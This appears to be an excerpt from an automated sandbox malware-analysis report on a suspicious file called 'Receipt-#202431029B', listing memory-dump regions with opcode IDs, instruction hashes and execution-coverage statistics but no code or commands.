                                                                  • Instruction Fuzzy Hash: 0E3136B0634108CFC700DF98C4597AA77FAEBA6314F94D459C116DB341CB71ED828BA4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9747ff5ebd1ea6f80950b318880c2d71bb5ee8559a2726811ebe9d5d490dd408
                                                                  • Instruction ID: 86a182fc1ef74e3e115d36e9c9bc4bfb6bb43758b8afd0390e747d5a1d4ff071
                                                                  • Opcode Fuzzy Hash: 9747ff5ebd1ea6f80950b318880c2d71bb5ee8559a2726811ebe9d5d490dd408
                                                                  • Instruction Fuzzy Hash: 5F31FF35A10619DFCB04EFA8C894CEDFBB5FF89310F018659E5056B224FB70A989CB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c2947c5a90e7afd05dceac4d76d58b11e3332e31876d3dbb103c3f8318ccc8c4
                                                                  • Instruction ID: d00d9d3510b3fa070b623dbc6980c3ad1cdf593d4127ab2b585698106594ff52
                                                                  • Opcode Fuzzy Hash: c2947c5a90e7afd05dceac4d76d58b11e3332e31876d3dbb103c3f8318ccc8c4
                                                                  • Instruction Fuzzy Hash: 1D3146B0E2020A9FCB41DFE8C8916EEBBF5EF49310F50846AD405E7254EB749A44CBA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 61f36df980e385fc37ec43f3b6a948c21d0c9d53fd4be6089a4032f0c4b26e33
                                                                  • Instruction ID: fefad09975d7b636a4baeeb93a47f510fd29bb33c3136f331a70e869e1cc214b
                                                                  • Opcode Fuzzy Hash: 61f36df980e385fc37ec43f3b6a948c21d0c9d53fd4be6089a4032f0c4b26e33
                                                                  • Instruction Fuzzy Hash: 0421D1B4B1050ACFDB20DBA4E944B6AB7FCFB49365F444429E51AD7340DB34D906CBA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c94966a268f7ec0972cbf2cd309b87fcd6c5fc81a6a2261d27195b7bd160fcef
                                                                  • Instruction ID: 0b715f03afa22abc992cdf7bfeeee79a781c0e5e50ff174d5e2883faba9b4b57
                                                                  • Opcode Fuzzy Hash: c94966a268f7ec0972cbf2cd309b87fcd6c5fc81a6a2261d27195b7bd160fcef
                                                                  • Instruction Fuzzy Hash: 24217175B112058FCF14DF69C8848AEBBB9FF89300B504569D905E7351EB70AD05CBA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1669442892.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_9cd000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0430fac57dc60433aaca7c90a8290c75d5eb805ce344a963cd3bbca942357f35
                                                                  • Instruction ID: 47d963fe2543497957c5d7f24f8a28e9c738d3b72b57ae675f3b9cb5d1682787
                                                                  • Opcode Fuzzy Hash: 0430fac57dc60433aaca7c90a8290c75d5eb805ce344a963cd3bbca942357f35
                                                                  • Instruction Fuzzy Hash: 0F21F571A053009FCB05DF14C9C4F26BBA5FB94314F24C97DE81A4B242C33AD806CB62
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1669442892.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_9cd000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a0af0a1df98d553cb1fd70fae5278fe940c28e15f164523877ae93d1440f66fe
                                                                  • Instruction ID: 1d42b923238cbca0404ba2fd6bbf8e2704d20d4aa3e23c3cd8f2eb76f9c007f1
                                                                  • Opcode Fuzzy Hash: a0af0a1df98d553cb1fd70fae5278fe940c28e15f164523877ae93d1440f66fe
                                                                  • Instruction Fuzzy Hash: 5321F575A05244DFCB05DF14D9C4F26BBA5FB94318F24C97DE90A4B292C33AE846CA63
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c6f31ef8f2bf222964e1670c31e7cd807faba6193c756e0529d5ac2b402fab3f
                                                                  • Instruction ID: cb9143d1fdafac02734b874828426352d57f0d9757102a6614e3aec6d7875194
                                                                  • Opcode Fuzzy Hash: c6f31ef8f2bf222964e1670c31e7cd807faba6193c756e0529d5ac2b402fab3f
                                                                  • Instruction Fuzzy Hash: D81190763001624BCF259B39DC404DF7B26DBC5221B1841BBE45DC7352CB34CC478292
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6b0192e3dcf1034a57cc3444017baf40506dbae5c5241b8a3d733e46bde3c373
                                                                  • Instruction ID: 1d1e5c33b12328b3f9e6e4632c1ecd2f8c6d3715116a5b765d24f8c2a0aabbc3
                                                                  • Opcode Fuzzy Hash: 6b0192e3dcf1034a57cc3444017baf40506dbae5c5241b8a3d733e46bde3c373
                                                                  • Instruction Fuzzy Hash: E5214175A1020A8FCF14EF69C8848AEF7B9FF88300B508569D915B7311EB70ED45CBA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 42323c48b91d98fd086122ab41434017d8e015aecb85711ada604ec1c31a2377
                                                                  • Instruction ID: c8a41644e166ec70f0e17b2ccab5f64af3d496198faac6054b34f884f1acfff7
                                                                  • Opcode Fuzzy Hash: 42323c48b91d98fd086122ab41434017d8e015aecb85711ada604ec1c31a2377
                                                                  • Instruction Fuzzy Hash: 432151F1E38515CBD7148AE9C8406B9B3ADAB4B314F904227A116EB690C7B4E9D08F76
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 50ce24358eb81077bf613ad71c718694eb780c04a39f744daf348ff8e82936c1
                                                                  • Instruction ID: aed71778204d6372f39a3893bba841ab3df3cac6617972ace77a26397ed7eced
                                                                  • Opcode Fuzzy Hash: 50ce24358eb81077bf613ad71c718694eb780c04a39f744daf348ff8e82936c1
                                                                  • Instruction Fuzzy Hash: 76217FB0E2121ACBCB40DFA8C6546EEB7B9FF89300F508925D11877345D7746E46CBA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7169793d325018d53d9a3728d0f291f52ddf3b89dfef4bebc52f259409c93b3f
                                                                  • Instruction ID: 38023eb4015daaef3324b2e0411a9fba2c4da80e51ed49505e7ce07c39219f4d
                                                                  • Opcode Fuzzy Hash: 7169793d325018d53d9a3728d0f291f52ddf3b89dfef4bebc52f259409c93b3f
                                                                  • Instruction Fuzzy Hash: 8F11C271B042545BC714ABBE985499FBFEADF85650F1440AAE509CB742EE209C4683E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 027e052411b144c62d69f8cbbec604df376ad103a538ccc6711a026a0088a48d
                                                                  • Instruction ID: 7e01da8ec31a7d236ee4ce178dcde584a7c885e7f96695727407f233039254a2
                                                                  • Opcode Fuzzy Hash: 027e052411b144c62d69f8cbbec604df376ad103a538ccc6711a026a0088a48d
                                                                  • Instruction Fuzzy Hash: A2119DB4710606DFCB249B64E944B6ABBEDFB4A350F444069E51ACB381DB34ED05CBA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 07ec1e24f5a2be3f24628210a4c75728ec6f539db873faa7d4b87b2ea54c566c
                                                                  • Instruction ID: 74f757333c38e144f3ccbdb241d905d5527416e8d7e955d254ac74bcbf5b9b97
                                                                  • Opcode Fuzzy Hash: 07ec1e24f5a2be3f24628210a4c75728ec6f539db873faa7d4b87b2ea54c566c
                                                                  • Instruction Fuzzy Hash: 7011AFB4710202DFDB14DF68D881B6A37EEFBC8310F548828E90ACB395DB309C468B60
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 46626c02bdfd035ebd06f4f82efe94a8e0d192b18844e36e528a7beeb59232cf
                                                                  • Instruction ID: 83c3588cdaa27b3c288b34b1104a934f88688a53e4fc6cb209630ba5fe395491
                                                                  • Opcode Fuzzy Hash: 46626c02bdfd035ebd06f4f82efe94a8e0d192b18844e36e528a7beeb59232cf
                                                                  • Instruction Fuzzy Hash: 472112B58103499FCB10DF9AD884ADEBFF8FB48320F50842AE919A7300C774A954CFA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1669442892.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_9cd000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                  • Instruction ID: 093a77074cfd3c823d22b3ce68a9abb01aad57c21cddb57b33e8b5c43d47135b
                                                                  • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                  • Instruction Fuzzy Hash: CF119075904240DFDB05CF54D5C4B15BB71FB84314F24C6ADD8494B656C33AD84ACB52
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1669442892.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_9cd000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                  • Instruction ID: 73b065d56d5fe53563f471ca5b0b3ee26abffeaa7dc3b0b1afad70018e603154
                                                                  • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                  • Instruction Fuzzy Hash: 9F119075944240DFDB05CF14D5C4B15BB72FB84314F24C6ADD9494B6A6C33AE84ACB62
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e909ff9b399f122f0d4c3da4e6f4fc4c85ca0506b0880b39e58a4e16d55ac1d9
                                                                  • Instruction ID: 1240e0e174f559ecd6f01451139a3277b8408570ffd5e98abad24c0c9d77bb7c
                                                                  • Opcode Fuzzy Hash: e909ff9b399f122f0d4c3da4e6f4fc4c85ca0506b0880b39e58a4e16d55ac1d9
                                                                  • Instruction Fuzzy Hash: 6201FB31604255AFCB069F69A8448AABFBAFF882107148027FA05C2252DB314D22DBA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8b5cebbafdfe18b2f2014ec11a56371212d5cdb7c2940b2ac2d39ce28213291f
                                                                  • Instruction ID: 756ec65b0e2e9bfd52c036935da05913570a68476de35cfaabc83cf73e3e85d8
                                                                  • Opcode Fuzzy Hash: 8b5cebbafdfe18b2f2014ec11a56371212d5cdb7c2940b2ac2d39ce28213291f
                                                                  • Instruction Fuzzy Hash: BBF068357053419FC3159F65E404A967FAAEBC9711F14807AE289CB245CE359806CBB0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d23c5d6c817ee62d43766c39d200311dc5aa16c981e3b27504436749533f541e
                                                                  • Instruction ID: 3954e20c9ca351c409eaba96f6cd4dc7535ec21e742d3c474732a306b5aa5d6f
                                                                  • Opcode Fuzzy Hash: d23c5d6c817ee62d43766c39d200311dc5aa16c981e3b27504436749533f541e
                                                                  • Instruction Fuzzy Hash: ABF090D157D2C4DFC31146A818250717FAEAA6B111FC824D7F4C7DB556D5A4490583B3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 62824f671d7a0c68b36bc6935c71e421f8d2ed8874bd4cd639905ea91fb5fad1
                                                                  • Instruction ID: 338f587c5e9771271bbbba742b7b0011cb0277602462663991a4ecedeba457db
                                                                  • Opcode Fuzzy Hash: 62824f671d7a0c68b36bc6935c71e421f8d2ed8874bd4cd639905ea91fb5fad1
                                                                  • Instruction Fuzzy Hash: 63F0E972214154AFDF15DB64EC41DEE7FBADF05220B0481BBE008CB221E670D950C7A1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 953e12d54d6fc59c8bdcb0b631bd6811122d6eb440b137d219cd15f4b6027a26
                                                                  • Instruction ID: 94231c554d24441566f6f0ff7678fe5f1062020b8ba52dee8f5674a69dd2b053
                                                                  • Opcode Fuzzy Hash: 953e12d54d6fc59c8bdcb0b631bd6811122d6eb440b137d219cd15f4b6027a26
                                                                  • Instruction Fuzzy Hash: 60F01235700219AF9B059F55E84486EBFAAFF8C210710802AFE15C3351DF718C22DB90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6a62afaa8d79a8f20acc9a99d263016f8c6d4a63976e281f1cf4f33901e44f61
                                                                  • Instruction ID: f1df04eaabb768c18296fb02f241f8f3c87e9410852aea180e404ede76cf1703
                                                                  • Opcode Fuzzy Hash: 6a62afaa8d79a8f20acc9a99d263016f8c6d4a63976e281f1cf4f33901e44f61
                                                                  • Instruction Fuzzy Hash: C5F09AB0E66385EFDB019BB4DC5EEADBB72AF46300F41C162E6226A2D1C7745C16CB11
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7619db77e7cfc810558e5d4cae518be32c37357019abfef3907d21a87fe01951
                                                                  • Instruction ID: c0e1d32fc852346019e2210419ec28b0102e3d71d68f1daffcac914ce7cf7065
                                                                  • Opcode Fuzzy Hash: 7619db77e7cfc810558e5d4cae518be32c37357019abfef3907d21a87fe01951
                                                                  • Instruction Fuzzy Hash: 08F0EDE093D28CDF83119AF46841C353FBC9B0B120FC000E3D08A8B243C9981A019FB3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f1828dea6621bcb0f496009817a9577d536144334958ba9e7aa7bedd88bb6e57
                                                                  • Instruction ID: 9b5bd0e24cdbb0528b426f7067dc3d852264b751b8c9f90f3fbbe96cb502d45a
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 74f6a831d0219da726a975f6bb1a729580e426b2b8b7c4d2262e9c85733602d8
                                                                  • Instruction ID: d4a7ddb14386da2f38985154ae270506006dd9f4c5873c148e2d659f17f34ed7
                                                                  • Opcode Fuzzy Hash: 74f6a831d0219da726a975f6bb1a729580e426b2b8b7c4d2262e9c85733602d8
                                                                  • Instruction Fuzzy Hash: D2E119B4E001598FCB14DFA8D580AAEFBF2BF89314F24C169D814AB355DB31A941DF61
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 838d4ed211eae573f03e1743b525f7d83142c4cd009346e537c0e7929801061a
                                                                  • Instruction ID: e751bb203db21d83f50d5f7e31fe77f9e2e39f3ac818d1636f7c917e391bb7a6
                                                                  • Opcode Fuzzy Hash: 838d4ed211eae573f03e1743b525f7d83142c4cd009346e537c0e7929801061a
                                                                  • Instruction Fuzzy Hash: B7E1E7B4E001598FCB14DFA9D580AAEFBF2BF89305F24C169D814AB355D731A942CFA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a3a00717825f52160ef5861f0d94fe399657784d1bd3602605143083a3c50a56
                                                                  • Instruction ID: 19061ad2229abefb53fc547f25020f2b65e5ce261786a715e51939c3f801d9ae
                                                                  • Opcode Fuzzy Hash: a3a00717825f52160ef5861f0d94fe399657784d1bd3602605143083a3c50a56
                                                                  • Instruction Fuzzy Hash: 17E1F8B4E001198FDB14DFA9D580AAEFBF2BF89305F24C569D814AB355DB30A941CFA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0181262c7bb8f95cd912978ed1d7b119e1382e4f88fdc3a2841c2f64b21adb17
                                                                  • Instruction ID: a62d80912cfc107b8c8702867586af467154b3ac67f672434e7cb92f5a9d3242
                                                                  • Opcode Fuzzy Hash: 0181262c7bb8f95cd912978ed1d7b119e1382e4f88fdc3a2841c2f64b21adb17
                                                                  • Instruction Fuzzy Hash: 6EE1F6B4E001598FCB14DFA9D580AAEFBF2BF89314F24C169D814AB355DB30A942DF61
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0482aade48582afa892f86cb9aa7c11b36d3d6b6d1842f3ca97eba871b92a7fb
                                                                  • Instruction ID: 0b5655a3a3fc4d5fe75d41f40deb9129a97fbef78d8462b5fd8a080fd65d6171
                                                                  • Opcode Fuzzy Hash: 0482aade48582afa892f86cb9aa7c11b36d3d6b6d1842f3ca97eba871b92a7fb
                                                                  • Instruction Fuzzy Hash: 0EE1E7B4E001598FCB14DFA9D590AAEBBF2FF89305F24C169D814AB355D730A942CFA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1669648402.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_a20000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7b1d0045b5f9fc6771db882ca7783da8016d47237cdd9801251fc0dfcccc1e12
                                                                  • Instruction ID: 2e673f87fdfcac571df4b25758a7c64f1c324516994ba859ec632507591ef983
                                                                  • Opcode Fuzzy Hash: 7b1d0045b5f9fc6771db882ca7783da8016d47237cdd9801251fc0dfcccc1e12
                                                                  • Instruction Fuzzy Hash: F0A15D32E00229CFCF19DFB8D9405AEB7B2FF95300B15857AE805AB265DB71E955CB80
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1678444630.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_5720000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dd201a0eaf8a82c0557aa5872f908201a8495c156f4c4ac47f14190c9dd780fa
                                                                  • Instruction ID: 2495ea9ed68165c6b6d4cbb52395b032f5c79af2680dd7e1ed0a5cfb3c1373fb
                                                                  • Opcode Fuzzy Hash: dd201a0eaf8a82c0557aa5872f908201a8495c156f4c4ac47f14190c9dd780fa
                                                                  • Instruction Fuzzy Hash: FFD10A3592075ACACB10EB74D950A99B7B1FF96300F51CB9AE44937224FB706AC9CB81
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1678444630.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_5720000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 357cf27dc2dca4a6b77c73662afcece8690d59a77dd2e3c49f21e2c73547b35c
                                                                  • Instruction ID: e45dcceac7c33f33483e7ed6a77af26a04efeae7f627cf3cb626b311608ecf1c
                                                                  • Opcode Fuzzy Hash: 357cf27dc2dca4a6b77c73662afcece8690d59a77dd2e3c49f21e2c73547b35c
                                                                  • Instruction Fuzzy Hash: 52D10A3592075ACACB10EF74D950A99B7B1FF96300F51CB9AE44937224FB706AC9CB81
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4a2fd89928254ee620cc09dc75cc38ce98dd53e35b29e7ad82553e8400e66c1b
                                                                  • Instruction ID: 534e6e27b9d24a0df8e9b11d09f4650760b623ac683322acd5b5a6ba9daed575
                                                                  • Opcode Fuzzy Hash: 4a2fd89928254ee620cc09dc75cc38ce98dd53e35b29e7ad82553e8400e66c1b
                                                                  • Instruction Fuzzy Hash: D9510BB4E002598BCB54CFA9D5809EEBBF2FF89304F24C16AD458AB355D7315941CFA1

                                                                  Execution Graph

                                                                  Execution Coverage:12.1%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:287
                                                                  Total number of Limit Nodes:14
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4106947630.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5370000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0
                                                                  • Opcode ID: 1a494ddc0f021d400ab74e1ea37e8769e1a01717a028cf613ff91ff7605e0f01
                                                                  • Instruction ID: 62421988254379975c4253ace5c6c61c40323d63c179a5b7c1f559b7ee973db3
                                                                  • Opcode Fuzzy Hash: 1a494ddc0f021d400ab74e1ea37e8769e1a01717a028cf613ff91ff7605e0f01
                                                                  • Instruction Fuzzy Hash: AC713671A00B098FDB24DF6AD44475ABBF6FF88304F00892DD49ADBA50DB79E845CB90
                                                                  Memory Dump Source
